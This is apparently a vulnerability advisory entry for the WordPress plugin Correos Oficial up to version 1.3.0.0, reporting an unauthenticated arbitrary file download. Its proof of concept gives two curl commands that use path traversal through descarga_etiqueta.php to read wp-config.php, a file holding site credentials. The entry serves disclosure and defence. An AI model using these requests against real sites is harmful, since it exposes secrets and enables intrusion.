WordPress Plugin Vulnerabilities
Correos Oficial <= 1.3.0.0 - Unauthenticated Arbitrary File Download
Description
The plugin does not have an authorization check user input validation when generating a file path, allowing unauthenticated attackers to download arbitrary files from the server.
Proof of Concept
Dependency: WooCommerce plugin Use the following curl command to download the contents of the wp-config.php file: curl -i 'https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=../../..&filename=wp-config.php' or curl -i 'https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=..&filename=/../../wp-config.php'
Affects Plugins
References
CVE
Classification
Type
FILE DOWNLOAD
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Andrea Iodice
Submitter
Andrea Iodice
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-01-31 (about 10 months ago)
Added
2023-01-31 (about 10 months ago)
Last Updated
2023-02-01 (about 10 months ago)